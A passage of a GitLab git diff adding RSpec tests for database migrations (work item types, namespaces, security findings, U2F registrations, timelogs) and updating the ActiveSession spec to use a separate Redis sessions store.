'Issue', namespace_id: nil, base_type: base_types[:issue], icon_name: 'issue-type-issue') + work_item_types.find_or_create_by!(name: 'Incident', namespace_id: nil, base_type: base_types[:incident], icon_name: 'issue-type-incident') + work_item_types.find_or_create_by!(name: 'Test Case', namespace_id: nil, base_type: base_types[:test_case], icon_name: 'issue-type-test-case') + work_item_types.find_or_create_by!(name: 'Requirement', namespace_id: nil, 
base_type: base_types[:requirement], icon_name: 'issue-type-requirements') reversible_migration do |migration| migration.before -> { - expect(work_item_types.all.pluck(:base_type)).to match_array(WorkItem::Type.base_types.values) + expect(work_item_types.all.pluck(:base_type)).to match_array(base_types.values) } migration.after -> { expect(work_item_types.count).to eq(4) - expect(work_item_types.all.pluck(:base_type)).to match_array(WorkItem::Type.base_types.values) + expect(work_item_types.all.pluck(:base_type)).to match_array(base_types.values) } end end diff --git a/spec/migrations/20211101222614_consume_remaining_user_namespace_jobs_spec.rb b/spec/migrations/20211101222614_consume_remaining_user_namespace_jobs_spec.rb new file mode 100644 index 00000000000..d78ecc26ebf --- /dev/null +++ b/spec/migrations/20211101222614_consume_remaining_user_namespace_jobs_spec.rb @@ -0,0 +1,21 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe ConsumeRemainingUserNamespaceJobs do + let(:namespaces) { table(:namespaces) } + let!(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org', type: nil) } + + context 'when Namespaces with nil `type` still exist' do + it 'steals sidekiq jobs from BackfillUserNamespace background migration' do + expect(Gitlab::BackgroundMigration).to receive(:steal).with('BackfillUserNamespace') + + migrate! + end + + it 'migrates namespaces without type' do + expect { migrate! }.to change { namespaces.where(type: 'User').count }.from(0).to(1) + end + end +end diff --git a/spec/migrations/20211110143306_add_not_null_constraint_to_security_findings_uuid_spec.rb b/spec/migrations/20211110143306_add_not_null_constraint_to_security_findings_uuid_spec.rb new file mode 100644 index 00000000000..946fbf7f568 --- /dev/null +++ b/spec/migrations/20211110143306_add_not_null_constraint_to_security_findings_uuid_spec.rb @@ -0,0 +1,23 @@ +# frozen_string_literal: true +require 'spec_helper' +require_migration! 
+ +RSpec.describe AddNotNullConstraintToSecurityFindingsUuid do + let_it_be(:security_findings) { table(:security_findings) } + let_it_be(:migration) { described_class.new } + + before do + allow(migration).to receive(:transaction_open?).and_return(false) + allow(migration).to receive(:with_lock_retries).and_yield + end + + it 'adds a check constraint' do + constraint = security_findings.connection.check_constraints(:security_findings).find { |constraint| constraint.expression == "uuid IS NOT NULL" } + expect(constraint).to be_nil + + migration.up + + constraint = security_findings.connection.check_constraints(:security_findings).find { |constraint| constraint.expression == "uuid IS NOT NULL" } + expect(constraint).to be_a(ActiveRecord::ConnectionAdapters::CheckConstraintDefinition) + end +end diff --git a/spec/migrations/20211110151350_schedule_drop_invalid_security_findings_spec.rb b/spec/migrations/20211110151350_schedule_drop_invalid_security_findings_spec.rb new file mode 100644 index 00000000000..b35cf5cbf4c --- /dev/null +++ b/spec/migrations/20211110151350_schedule_drop_invalid_security_findings_spec.rb @@ -0,0 +1,71 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe ScheduleDropInvalidSecurityFindings, :migration, schema: 20211108211434 do + let_it_be(:background_migration_jobs) { table(:background_migration_jobs) } + + let_it_be(:namespace) { table(:namespaces).create!(name: 'user', path: 'user', type: Namespaces::UserNamespace.sti_name) } + let_it_be(:project) { table(:projects).create!(namespace_id: namespace.id) } + + let_it_be(:pipelines) { table(:ci_pipelines) } + let_it_be(:pipeline) { pipelines.create!(project_id: project.id) } + + let_it_be(:ci_builds) { table(:ci_builds) } + let_it_be(:ci_build) { ci_builds.create! 
} + + let_it_be(:security_scans) { table(:security_scans) } + let_it_be(:security_scan) do + security_scans.create!( + scan_type: 1, + status: 1, + build_id: ci_build.id, + project_id: project.id, + pipeline_id: pipeline.id + ) + end + + let_it_be(:vulnerability_scanners) { table(:vulnerability_scanners) } + let_it_be(:vulnerability_scanner) { vulnerability_scanners.create!(project_id: project.id, external_id: 'test 1', name: 'test scanner 1') } + + let_it_be(:security_findings) { table(:security_findings) } + let_it_be(:security_finding_without_uuid) do + security_findings.create!( + severity: 1, + confidence: 1, + scan_id: security_scan.id, + scanner_id: vulnerability_scanner.id, + uuid: nil + ) + end + + let_it_be(:security_finding_with_uuid) do + security_findings.create!( + severity: 1, + confidence: 1, + scan_id: security_scan.id, + scanner_id: vulnerability_scanner.id, + uuid: 'bd95c085-71aa-51d7-9bb6-08ae669c262e' + ) + end + + before do + stub_const("#{described_class}::BATCH_SIZE", 1) + stub_const("#{described_class}::SUB_BATCH_SIZE", 1) + end + + around do |example| + freeze_time { Sidekiq::Testing.fake! { example.run } } + end + + it 'schedules background migrations' do + migrate! 
+ + expect(background_migration_jobs.count).to eq(1) + expect(background_migration_jobs.first.arguments).to match_array([security_finding_without_uuid.id, security_finding_without_uuid.id, described_class::SUB_BATCH_SIZE]) + + expect(BackgroundMigrationWorker.jobs.size).to eq(1) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(2.minutes, security_finding_without_uuid.id, security_finding_without_uuid.id, described_class::SUB_BATCH_SIZE) + end +end diff --git a/spec/migrations/20211116091751_change_namespace_type_default_to_user_spec.rb b/spec/migrations/20211116091751_change_namespace_type_default_to_user_spec.rb new file mode 100644 index 00000000000..deba6f9b87c --- /dev/null +++ b/spec/migrations/20211116091751_change_namespace_type_default_to_user_spec.rb @@ -0,0 +1,5 @@ +# frozen_string_literal: true + +# With https://gitlab.com/gitlab-org/gitlab/-/merge_requests/73495, we no longer allow +# a Namespace type to be nil. There is nothing left to test for this migration, +# but we'll keep this file here as a tombstone. diff --git a/spec/migrations/20211116111644_schedule_remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb b/spec/migrations/20211116111644_schedule_remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb new file mode 100644 index 00000000000..c1d96f50dc8 --- /dev/null +++ b/spec/migrations/20211116111644_schedule_remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb @@ -0,0 +1,191 @@ +# frozen_string_literal: true +require 'spec_helper' + +require_migration! + +RSpec.describe ScheduleRemoveOccurrencePipelinesAndDuplicateVulnerabilitiesFindings, :migration do + let_it_be(:background_migration_jobs) { table(:background_migration_jobs) } + let_it_be(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } + let_it_be(:users) { table(:users) } + let_it_be(:user) { create_user! 
} + let_it_be(:project) { table(:projects).create!(id: 14219619, namespace_id: namespace.id) } + let_it_be(:pipelines) { table(:ci_pipelines) } + let_it_be(:scanners) { table(:vulnerability_scanners) } + let_it_be(:scanner1) { scanners.create!(project_id: project.id, external_id: 'test 1', name: 'test scanner 1') } + let_it_be(:scanner2) { scanners.create!(project_id: project.id, external_id: 'test 2', name: 'test scanner 2') } + let_it_be(:scanner3) { scanners.create!(project_id: project.id, external_id: 'test 3', name: 'test scanner 3') } + let_it_be(:unrelated_scanner) { scanners.create!(project_id: project.id, external_id: 'unreleated_scanner', name: 'unrelated scanner') } + let_it_be(:vulnerabilities) { table(:vulnerabilities) } + let_it_be(:vulnerability_findings) { table(:vulnerability_occurrences) } + let_it_be(:vulnerability_finding_pipelines) { table(:vulnerability_occurrence_pipelines) } + let_it_be(:vulnerability_identifiers) { table(:vulnerability_identifiers) } + let_it_be(:vulnerability_identifier) do + vulnerability_identifiers.create!( + id: 1244459, + project_id: project.id, + external_type: 'vulnerability-identifier', + external_id: 'vulnerability-identifier', + fingerprint: '0a203e8cd5260a1948edbedc76c7cb91ad6a2e45', + name: 'vulnerability identifier') + end + + let_it_be(:vulnerability_for_first_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let_it_be(:first_finding_duplicate) do + create_finding!( + id: 5606961, + uuid: "bd95c085-71aa-51d7-9bb6-08ae669c262e", + vulnerability_id: vulnerability_for_first_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner1.id, + project_id: project.id + ) + end + + let_it_be(:vulnerability_for_second_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let_it_be(:second_finding_duplicate) do 
+ create_finding!( + id: 8765432, + uuid: "5b714f58-1176-5b26-8fd5-e11dfcb031b5", + vulnerability_id: vulnerability_for_second_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner2.id, + project_id: project.id + ) + end + + let_it_be(:vulnerability_for_third_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let_it_be(:third_finding_duplicate) do + create_finding!( + id: 8832995, + uuid: "cfe435fa-b25b-5199-a56d-7b007cc9e2d4", + vulnerability_id: vulnerability_for_third_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner3.id, + project_id: project.id + ) + end + + let_it_be(:unrelated_finding) do + create_finding!( + id: 9999999, + uuid: "unreleated_finding", + vulnerability_id: nil, + report_type: 1, + location_fingerprint: 'random_location_fingerprint', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: unrelated_scanner.id, + project_id: project.id + ) + end + + before do + stub_const("#{described_class}::BATCH_SIZE", 1) + + 4.times do + create_finding_pipeline!(project_id: project.id, finding_id: first_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: second_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: third_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: unrelated_finding.id) + end + end + + around do |example| + freeze_time { Sidekiq::Testing.fake! { example.run } } + end + + it 'schedules background migrations' do + migrate! 
+ + expect(background_migration_jobs.count).to eq(4) + expect(background_migration_jobs.first.arguments).to match_array([first_finding_duplicate.id, first_finding_duplicate.id]) + expect(background_migration_jobs.second.arguments).to match_array([second_finding_duplicate.id, second_finding_duplicate.id]) + expect(background_migration_jobs.third.arguments).to match_array([third_finding_duplicate.id, third_finding_duplicate.id]) + expect(background_migration_jobs.fourth.arguments).to match_array([unrelated_finding.id, unrelated_finding.id]) + + expect(BackgroundMigrationWorker.jobs.size).to eq(4) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(2.minutes, first_finding_duplicate.id, first_finding_duplicate.id) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(4.minutes, second_finding_duplicate.id, second_finding_duplicate.id) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(6.minutes, third_finding_duplicate.id, third_finding_duplicate.id) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(8.minutes, unrelated_finding.id, unrelated_finding.id) + end + + private + + def create_vulnerability!(project_id:, author_id:, title: 'test', severity: 7, confidence: 7, report_type: 0) + vulnerabilities.create!( + project_id: project_id, + author_id: author_id, + title: title, + severity: severity, + confidence: confidence, + report_type: report_type + ) + end + + # rubocop:disable Metrics/ParameterLists + def create_finding!( + id: nil, + vulnerability_id:, project_id:, scanner_id:, primary_identifier_id:, + name: "test", severity: 7, confidence: 7, report_type: 0, + project_fingerprint: '123qweasdzxc', location_fingerprint: 'test', + metadata_version: 'test', raw_metadata: 'test', uuid: 'test') + params = { + vulnerability_id: vulnerability_id, + project_id: project_id, + name: name, + severity: severity, + confidence: confidence, + report_type: report_type, + project_fingerprint: 
project_fingerprint, + scanner_id: scanner_id, + primary_identifier_id: vulnerability_identifier.id, + location_fingerprint: location_fingerprint, + metadata_version: metadata_version, + raw_metadata: raw_metadata, + uuid: uuid + } + params[:id] = id unless id.nil? + vulnerability_findings.create!(params) + end + # rubocop:enable Metrics/ParameterLists + + def create_user!(name: "Example User", email: "user@example.com", user_type: nil, created_at: Time.zone.now, confirmed_at: Time.zone.now) + users.create!( + name: name, + email: email, + username: name, + projects_limit: 0, + user_type: user_type, + confirmed_at: confirmed_at + ) + end + + def create_finding_pipeline!(project_id:, finding_id:) + pipeline = pipelines.create!(project_id: project_id) + vulnerability_finding_pipelines.create!(pipeline_id: pipeline.id, occurrence_id: finding_id) + end +end diff --git a/spec/migrations/20211117084814_migrate_remaining_u2f_registrations_spec.rb b/spec/migrations/20211117084814_migrate_remaining_u2f_registrations_spec.rb new file mode 100644 index 00000000000..6a82ed016af --- /dev/null +++ b/spec/migrations/20211117084814_migrate_remaining_u2f_registrations_spec.rb @@ -0,0 +1,43 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe MigrateRemainingU2fRegistrations, :migration do + let(:u2f_registrations) { table(:u2f_registrations) } + let(:webauthn_registrations) { table(:webauthn_registrations) } + let(:users) { table(:users) } + + let(:user) { users.create!(email: 'email@email.com', name: 'foo', username: 'foo', projects_limit: 0) } + + before do + create_u2f_registration(1, 'reg1') + create_u2f_registration(2, 'reg2') + create_u2f_registration(3, '') + create_u2f_registration(4, nil) + webauthn_registrations.create!({ name: 'reg1', u2f_registration_id: 1, credential_xid: '', public_key: '', user_id: user.id }) + end + + it 'correctly migrates u2f registrations previously not migrated' do + expect { migrate! 
}.to change { webauthn_registrations.count }.from(1).to(4) + end + + it 'migrates all valid u2f registrations depite errors' do + create_u2f_registration(5, 'reg3', 'invalid!') + create_u2f_registration(6, 'reg4') + + expect { migrate! }.to change { webauthn_registrations.count }.from(1).to(5) + end + + def create_u2f_registration(id, name, public_key = nil) + device = U2F::FakeU2F.new(FFaker::BaconIpsum.characters(5), { key_handle: SecureRandom.random_bytes(255) }) + public_key ||= Base64.strict_encode64(device.origin_public_key_raw) + u2f_registrations.create!({ id: id, + certificate: Base64.strict_encode64(device.cert_raw), + key_handle: U2F.urlsafe_encode64(device.key_handle_raw), + public_key: public_key, + counter: 5, + name: name, + user_id: user.id }) + end +end diff --git a/spec/migrations/20211126115449_encrypt_static_objects_external_storage_auth_token_spec.rb b/spec/migrations/20211126115449_encrypt_static_objects_external_storage_auth_token_spec.rb new file mode 100644 index 00000000000..bc8b7c56676 --- /dev/null +++ b/spec/migrations/20211126115449_encrypt_static_objects_external_storage_auth_token_spec.rb @@ -0,0 +1,56 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe EncryptStaticObjectsExternalStorageAuthToken, :migration do + let(:application_settings) do + Class.new(ActiveRecord::Base) do + self.table_name = 'application_settings' + end + end + + context 'when static_objects_external_storage_auth_token is not set' do + it 'does nothing' do + application_settings.create! 
+ + reversible_migration do |migration| + migration.before -> { + settings = application_settings.first + + expect(settings.static_objects_external_storage_auth_token).to be_nil + expect(settings.static_objects_external_storage_auth_token_encrypted).to be_nil + } + + migration.after -> { + settings = application_settings.first + + expect(settings.static_objects_external_storage_auth_token).to be_nil + expect(settings.static_objects_external_storage_auth_token_encrypted).to be_nil + } + end + end + end + + context 'when static_objects_external_storage_auth_token is set' do + it 'encrypts static_objects_external_storage_auth_token' do + settings = application_settings.create! + settings.update_column(:static_objects_external_storage_auth_token, 'Test') + + reversible_migration do |migration| + migration.before -> { + settings = application_settings.first + + expect(settings.static_objects_external_storage_auth_token).to eq('Test') + expect(settings.static_objects_external_storage_auth_token_encrypted).to be_nil + } + migration.after -> { + settings = application_settings.first + + expect(settings.static_objects_external_storage_auth_token).to eq('Test') + expect(settings.static_objects_external_storage_auth_token_encrypted).to be_present + } + end + end + end +end diff --git a/spec/migrations/20211126204445_add_task_to_work_item_types_spec.rb b/spec/migrations/20211126204445_add_task_to_work_item_types_spec.rb new file mode 100644 index 00000000000..b80e4703f07 --- /dev/null +++ b/spec/migrations/20211126204445_add_task_to_work_item_types_spec.rb @@ -0,0 +1,54 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! 
+ +RSpec.describe AddTaskToWorkItemTypes, :migration do + include MigrationHelpers::WorkItemTypesHelper + + let_it_be(:work_item_types) { table(:work_item_types) } + + let(:base_types) do + { + issue: 0, + incident: 1, + test_case: 2, + requirement: 3, + task: 4 + } + end + + after(:all) do + # Make sure base types are recreated after running the migration + # because migration specs are not run in a transaction + reset_work_item_types + end + + it 'skips creating the record if it already exists' do + reset_db_state_prior_to_migration + work_item_types.find_or_create_by!(name: 'Task', namespace_id: nil, base_type: base_types[:task], icon_name: 'issue-type-task') + + expect do + migrate! + end.to not_change(work_item_types, :count) + end + + it 'adds task to base work item types' do + reset_db_state_prior_to_migration + + expect do + migrate! + end.to change(work_item_types, :count).from(4).to(5) + + expect(work_item_types.all.pluck(:base_type)).to include(base_types[:task]) + end + + def reset_db_state_prior_to_migration + # Database needs to be in a similar state as when this migration was created + work_item_types.delete_all + work_item_types.find_or_create_by!(name: 'Issue', namespace_id: nil, base_type: base_types[:issue], icon_name: 'issue-type-issue') + work_item_types.find_or_create_by!(name: 'Incident', namespace_id: nil, base_type: base_types[:incident], icon_name: 'issue-type-incident') + work_item_types.find_or_create_by!(name: 'Test Case', namespace_id: nil, base_type: base_types[:test_case], icon_name: 'issue-type-test-case') + work_item_types.find_or_create_by!(name: 'Requirement', namespace_id: nil, base_type: base_types[:requirement], icon_name: 'issue-type-requirements') + end +end diff --git a/spec/migrations/20211130165043_backfill_sequence_column_for_sprints_table_spec.rb b/spec/migrations/20211130165043_backfill_sequence_column_for_sprints_table_spec.rb new file mode 100644 index 00000000000..809ee53462f --- /dev/null +++ 
b/spec/migrations/20211130165043_backfill_sequence_column_for_sprints_table_spec.rb @@ -0,0 +1,42 @@ +# frozen_string_literal: true + +require 'spec_helper' + +require_migration! + +RSpec.describe BackfillSequenceColumnForSprintsTable, :migration, schema: 20211126042235 do + let(:migration) { described_class.new } + let(:namespaces) { table(:namespaces) } + let(:sprints) { table(:sprints) } + let(:iterations_cadences) { table(:iterations_cadences) } + + let!(:group) { namespaces.create!(name: 'foo', path: 'foo') } + let!(:cadence_1) { iterations_cadences.create!(group_id: group.id, title: "cadence 1") } + let!(:cadence_2) { iterations_cadences.create!(group_id: group.id, title: "cadence 2") } + let!(:iteration_1) { sprints.create!(id: 1, group_id: group.id, iterations_cadence_id: cadence_1.id, start_date: Date.new(2021, 11, 1), due_date: Date.new(2021, 11, 5), iid: 1, title: 'a' ) } + let!(:iteration_2) { sprints.create!(id: 2, group_id: group.id, iterations_cadence_id: cadence_1.id, start_date: Date.new(2021, 12, 1), due_date: Date.new(2021, 12, 5), iid: 2, title: 'b') } + let!(:iteration_3) { sprints.create!(id: 3, group_id: group.id, iterations_cadence_id: cadence_2.id, start_date: Date.new(2021, 12, 1), due_date: Date.new(2021, 12, 5), iid: 4, title: 'd') } + let!(:iteration_4) { sprints.create!(id: 4, group_id: group.id, iterations_cadence_id: nil, start_date: Date.new(2021, 11, 15), due_date: Date.new(2021, 11, 20), iid: 3, title: 'c') } + + describe '#up' do + it "correctly sets the sequence attribute with idempotency" do + migration.up + + expect(iteration_1.reload.sequence).to be 1 + expect(iteration_2.reload.sequence).to be 2 + expect(iteration_3.reload.sequence).to be 1 + expect(iteration_4.reload.sequence).to be nil + + iteration_5 = sprints.create!(id: 5, group_id: group.id, iterations_cadence_id: cadence_1.id, start_date: Date.new(2022, 1, 1), due_date: Date.new(2022, 1, 5), iid: 1, title: 'e' ) + + migration.down + migration.up + + 
expect(iteration_1.reload.sequence).to be 1 + expect(iteration_2.reload.sequence).to be 2 + expect(iteration_5.reload.sequence).to be 3 + expect(iteration_3.reload.sequence).to be 1 + expect(iteration_4.reload.sequence).to be nil + end + end +end diff --git a/spec/migrations/20211203091642_add_index_to_projects_on_marked_for_deletion_at_spec.rb b/spec/migrations/20211203091642_add_index_to_projects_on_marked_for_deletion_at_spec.rb new file mode 100644 index 00000000000..2e1289c58f7 --- /dev/null +++ b/spec/migrations/20211203091642_add_index_to_projects_on_marked_for_deletion_at_spec.rb @@ -0,0 +1,18 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe AddIndexToProjectsOnMarkedForDeletionAt do + it 'correctly migrates up and down' do + reversible_migration do |migration| + migration.before -> { + expect(ActiveRecord::Base.connection.indexes('projects').map(&:name)).not_to include('index_projects_not_aimed_for_deletion') + } + + migration.after -> { + expect(ActiveRecord::Base.connection.indexes('projects').map(&:name)).to include('index_projects_not_aimed_for_deletion') + } + end + end +end diff --git a/spec/migrations/schedule_recalculate_vulnerability_finding_signatures_for_findings_spec.rb b/spec/migrations/schedule_recalculate_vulnerability_finding_signatures_for_findings_spec.rb new file mode 100644 index 00000000000..2545bb4a66c --- /dev/null +++ b/spec/migrations/schedule_recalculate_vulnerability_finding_signatures_for_findings_spec.rb @@ -0,0 +1,88 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe ScheduleRecalculateVulnerabilityFindingSignaturesForFindings, :migration do + before do + allow(Gitlab).to receive(:ee?).and_return(ee?) + stub_const("#{described_class.name}::BATCH_SIZE", 2) + end + + context 'when the Gitlab instance is FOSS' do + let(:ee?) { false } + + it 'does not run the migration' do + expect { migrate! 
}.not_to change { BackgroundMigrationWorker.jobs.size } + end + end + + context 'when the Gitlab instance is EE' do + let(:ee?) { true } + + let_it_be(:namespaces) { table(:namespaces) } + let_it_be(:projects) { table(:projects) } + let_it_be(:findings) { table(:vulnerability_occurrences) } + let_it_be(:scanners) { table(:vulnerability_scanners) } + let_it_be(:identifiers) { table(:vulnerability_identifiers) } + let_it_be(:vulnerability_finding_signatures) { table(:vulnerability_finding_signatures) } + + let_it_be(:namespace) { namespaces.create!(name: 'test', path: 'test') } + let_it_be(:project) { projects.create!(namespace_id: namespace.id, name: 'gitlab', path: 'gitlab') } + + let_it_be(:scanner) do + scanners.create!(project_id: project.id, external_id: 'trivy', name: 'Security Scanner') + end + + let_it_be(:identifier) do + identifiers.create!(project_id: project.id, + fingerprint: 'd432c2ad2953e8bd587a3a43b3ce309b5b0154c123', + external_type: 'SECURITY_ID', + external_id: 'SECURITY_0', + name: 'SECURITY_IDENTIFIER 0') + end + + let_it_be(:finding1) { findings.create!(finding_params) } + let_it_be(:signature1) { vulnerability_finding_signatures.create!(finding_id: finding1.id, algorithm_type: 0, signature_sha: ::Digest::SHA1.digest(SecureRandom.hex(50))) } + + let_it_be(:finding2) { findings.create!(finding_params) } + let_it_be(:signature2) { vulnerability_finding_signatures.create!(finding_id: finding2.id, algorithm_type: 0, signature_sha: ::Digest::SHA1.digest(SecureRandom.hex(50))) } + + let_it_be(:finding3) { findings.create!(finding_params) } + let_it_be(:signature3) { vulnerability_finding_signatures.create!(finding_id: finding3.id, algorithm_type: 0, signature_sha: ::Digest::SHA1.digest(SecureRandom.hex(50))) } + + it 'schedules the background jobs', :aggregate_failure do + Sidekiq::Testing.fake! do + freeze_time do + migrate! 
+ + expect(BackgroundMigrationWorker.jobs.size).to eq(2) + expect(described_class::MIGRATION) + .to be_scheduled_migration_with_multiple_args(signature1.id, signature2.id) + expect(described_class::MIGRATION) + .to be_scheduled_migration_with_multiple_args(signature3.id, signature3.id) + end + end + end + + def finding_params + uuid = SecureRandom.uuid + + { + severity: 0, + confidence: 5, + report_type: 2, + project_id: project.id, + scanner_id: scanner.id, + primary_identifier_id: identifier.id, + location: nil, + project_fingerprint: SecureRandom.hex(20), + location_fingerprint: Digest::SHA1.hexdigest(SecureRandom.hex(10)), + uuid: uuid, + name: "Vulnerability Finding #{uuid}", + metadata_version: '1.3', + raw_metadata: '{}' + } + end + end +end diff --git a/spec/migrations/schedule_update_timelogs_null_spent_at_spec.rb b/spec/migrations/schedule_update_timelogs_null_spent_at_spec.rb new file mode 100644 index 00000000000..a81059518e6 --- /dev/null +++ b/spec/migrations/schedule_update_timelogs_null_spent_at_spec.rb @@ -0,0 +1,44 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! 
+ +RSpec.describe ScheduleUpdateTimelogsNullSpentAt do + let_it_be(:namespace) { table(:namespaces).create!(name: 'namespace', path: 'namespace') } + let_it_be(:project) { table(:projects).create!(namespace_id: namespace.id) } + let_it_be(:issue) { table(:issues).create!(project_id: project.id) } + let_it_be(:merge_request) { table(:merge_requests).create!(target_project_id: project.id, source_branch: 'master', target_branch: 'feature') } + let_it_be(:timelog1) { create_timelog!(merge_request_id: merge_request.id) } + let_it_be(:timelog2) { create_timelog!(merge_request_id: merge_request.id) } + let_it_be(:timelog3) { create_timelog!(merge_request_id: merge_request.id) } + let_it_be(:timelog4) { create_timelog!(issue_id: issue.id) } + let_it_be(:timelog5) { create_timelog!(issue_id: issue.id) } + + before_all do + table(:timelogs).where.not(id: timelog3.id).update_all(spent_at: nil) + end + + it 'correctly schedules background migrations' do + stub_const("#{described_class}::BATCH_SIZE", 2) + + Sidekiq::Testing.fake! do + freeze_time do + migrate! 
+ + expect(described_class::MIGRATION) + .to be_scheduled_delayed_migration(2.minutes, timelog1.id, timelog2.id) + + expect(described_class::MIGRATION) + .to be_scheduled_delayed_migration(4.minutes, timelog4.id, timelog5.id) + + expect(BackgroundMigrationWorker.jobs.size).to eq(2) + end + end + end + + private + + def create_timelog!(**args) + table(:timelogs).create!(**args, time_spent: 1) + end +end diff --git a/spec/models/active_session_spec.rb b/spec/models/active_session_spec.rb index 2fd7b127500..751d31ad95a 100644 --- a/spec/models/active_session_spec.rb +++ b/spec/models/active_session_spec.rb @@ -2,7 +2,8 @@ require 'spec_helper' -RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do +RSpec.describe ActiveSession, :clean_gitlab_redis_sessions do + let(:lookup_key) { described_class.lookup_key_name(user.id) } let(:user) do create(:user).tap do |user| user.current_sign_in_at = Time.current @@ -43,52 +44,88 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do end describe '.list' do + def make_session(id) + described_class.new(session_id: id) + end + it 'returns all sessions by user' do - Gitlab::Redis::SharedState.with do |redis| - redis.set("session:user:gitlab:#{user.id}:6919a6f1bb119dd7396fadc38fd18d0d", Marshal.dump({ session_id: 'a' })) - redis.set("session:user:gitlab:#{user.id}:59822c7d9fcdfa03725eff41782ad97d", Marshal.dump({ session_id: 'b' })) - redis.set("session:user:gitlab:9999:5c8611e4f9c69645ad1a1492f4131358", '') + Gitlab::Redis::Sessions.with do |redis| + # Some deprecated sessions + redis.set(described_class.key_name_v1(user.id, "6919a6f1bb119dd7396fadc38fd18d0d"), Marshal.dump(make_session('a'))) + redis.set(described_class.key_name_v1(user.id, "59822c7d9fcdfa03725eff41782ad97d"), Marshal.dump(make_session('b'))) + # Some new sessions + redis.set(described_class.key_name(user.id, 'some-unique-id-x'), make_session('c').dump) + redis.set(described_class.key_name(user.id, 'some-unique-id-y'), 
make_session('d').dump) + # Some red herrings + redis.set(described_class.key_name(9999, "5c8611e4f9c69645ad1a1492f4131358"), 'irrelevant') + redis.set(described_class.key_name_v1(9999, "5c8611e4f9c69645ad1a1492f4131358"), 'irrelevant') redis.sadd( - "session:lookup:user:gitlab:#{user.id}", + lookup_key, %w[ 6919a6f1bb119dd7396fadc38fd18d0d 59822c7d9fcdfa03725eff41782ad97d + some-unique-id-x + some-unique-id-y ] ) end - expect(ActiveSession.list(user)).to match_array [{ session_id: 'a' }, { session_id: 'b' }] + expect(described_class.list(user)).to contain_exactly( + have_attributes(session_id: 'a'), + have_attributes(session_id: 'b'), + have_attributes(session_id: 'c'), + have_attributes(session_id: 'd') + ) end - it 'does not return obsolete entries and cleans them up' do - Gitlab::Redis::SharedState.with do |redis| - redis.set("session:user:gitlab:#{user.id}:6919a6f1bb119dd7396fadc38fd18d0d", Marshal.dump({ session_id: 'a' })) + shared_examples 'ignoring obsolete entries' do + let(:session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } + let(:session) { described_class.new(session_id: 'a') } - redis.sadd( - "session:lookup:user:gitlab:#{user.id}", - %w[ - 6919a6f1bb119dd7396fadc38fd18d0d - 59822c7d9fcdfa03725eff41782ad97d - ] - ) - end + it 'does not return obsolete entries and cleans them up' do + Gitlab::Redis::Sessions.with do |redis| + redis.set(session_key, serialized_session) + + redis.sadd( + lookup_key, + [ + session_id, + '59822c7d9fcdfa03725eff41782ad97d' + ] + ) + end - expect(ActiveSession.list(user)).to eq [{ session_id: 'a' }] + expect(ActiveSession.list(user)).to contain_exactly(session) - Gitlab::Redis::SharedState.with do |redis| - expect(redis.sscan_each("session:lookup:user:gitlab:#{user.id}").to_a).to eq ['6919a6f1bb119dd7396fadc38fd18d0d'] + Gitlab::Redis::Sessions.with do |redis| + expect(redis.sscan_each(lookup_key)).to contain_exactly session_id + end end end - it 'returns an empty array if the use does not have any active session' do - 
expect(ActiveSession.list(user)).to eq [] + context 'when the current session is in the old format' do + let(:session_key) { described_class.key_name_v1(user.id, session_id) } + let(:serialized_session) { Marshal.dump(session) } + + it_behaves_like 'ignoring obsolete entries' + end + + context 'when the current session is in the new format' do + let(:session_key) { described_class.key_name(user.id, session_id) } + let(:serialized_session) { session.dump } + + it_behaves_like 'ignoring obsolete entries' + end + + it 'returns an empty array if the user does not have any active session' do + expect(ActiveSession.list(user)).to be_empty end end describe '.list_sessions' do it 'uses the ActiveSession lookup to return original sessions' do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| # Emulate redis-rack: https://github.com/redis-store/redis-rack/blob/c75f7f1a6016ee224e2615017fbfee964f23a837/lib/rack/session/redis.rb#L88 redis.set("session:gitlab:#{rack_session.private_id}", Marshal.dump({ _csrf_token: 'abcd' })) @@ -107,19 +144,17 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do describe '.session_ids_for_user' do it 'uses the user lookup table to return session ids' do - session_ids = ['59822c7d9fcdfa03725eff41782ad97d'] - - Gitlab::Redis::SharedState.with do |redis| - 